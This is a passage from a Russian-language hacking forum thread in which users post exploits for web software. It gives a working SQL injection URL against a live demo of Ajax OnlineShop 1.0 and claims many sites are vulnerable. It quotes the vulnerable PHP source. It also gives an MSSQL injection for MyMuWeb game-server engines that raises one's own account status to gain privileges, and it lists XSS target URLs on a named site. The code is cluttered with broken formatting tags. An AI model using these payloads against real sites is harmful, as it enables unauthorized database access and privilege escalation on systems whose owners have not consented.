[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'|'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Сайт (URL): __XSS
Путь
Сообщение от None
http://wap-engine.ru/modules/news/last.php
http://wap-engine.ru/modules/news/last1.php
|
|
|
|
13.11.2010, 11:31
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29
параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
[COLOR="#000000"]// if get id in url but no #
if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {
wohinJS = 'reload';
var start_name = document.URL.split ('?id=');
var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
}
else {
var start_name = document.URL.split ('#');
[COLOR="#0000BB"]
[/COLOR] if (start_name[1]) { // exist history-ID in url...
wohinJS = 'reload';
start_name = start_name[1].split ('('); // ...yes, split the name
var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
//$('log').innerHTML = start_name[0] + " - " + start_id; // testing
var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
addHistoryEvent(hist_event_name, start_id); // load requested page
}
else { // ...no, then load shop-startpage
[COLOR="#0000BB"][/COLOR][/COLOR]
уязвимы все сайты,их достаточно много
|
|
|
|
14.11.2010, 21:17
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от 547
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29
параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
[COLOR="#000000"]// if get id in url but no #
if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {
wohinJS = 'reload';
var start_name = document.URL.split ('?id=');
var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
}
else {
var start_name = document.URL.split ('#');
[COLOR="#0000BB"]
[/COLOR] if (start_name[1]) { // exist history-ID in url...
wohinJS = 'reload';
start_name = start_name[1].split ('('); // ...yes, split the name
var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
//$('log').innerHTML = start_name[0] + " - " + start_id; // testing
var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
addHistoryEvent(hist_event_name, start_id); // load requested page
}
else { // ...no, then load shop-startpage
[COLOR="#0000BB"][/COLOR][/COLOR]
уязвимы все сайты,их достаточно много
547, не тот код уязвим.
Так правильнее будет.
--->index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) ) {
[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"false"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else {
[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_startpage_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$seo_infos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]seo_get_site_infos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
--->config.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_prod_comments[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"backgroundcolor: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gen_seitenzahlarr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"aong_shop_art_comments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodID =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND del='N'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM aong_shop_art_comments "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"where_state"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ORDER BY ID DESC[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$page_prodcomments_amount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]count_rows[/COLOR][COLOR="#007700"]();
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"oben"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=
[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
}
else{
[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_div_weich'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
}
if ( ([/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&& ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ){
[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" color: #2A5206;"[/COLOR][COLOR="#007700"];
}
else {
[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"am "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"d.m.Y"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" um "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"H:i"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" Uhr
vor "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]intervall[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()-[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]++;
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"unten"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"];
}
....
[/COLOR][/COLOR]
https://rdot.org/forum/showpost.php?p=9338&postcount=5
|
|
|
|
15.11.2010, 05:06
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
С нами:
9134867
Репутация:
44
|
|
MyMuWeb 0.7,0.6 (более ранние не смотрел)
Движок довольно часто встречается на игровых серверах Mu Online. Фикс давно вышел, но есть еще довольно много "отсталых".
Sql injection :
Код:
http://localhost/?ref='updаtе/**/memb_info/**/set/**/mmw_status='9'/**/where/**/memb___id='Ваш юзернейм'--&ref=Существующий на сервере юзернейм (можно свой)
П.С. БД железобетонно MSSQL. |
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2402757){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2403619){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2411266){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2424998){kind=avatar}
Комбинированный вид
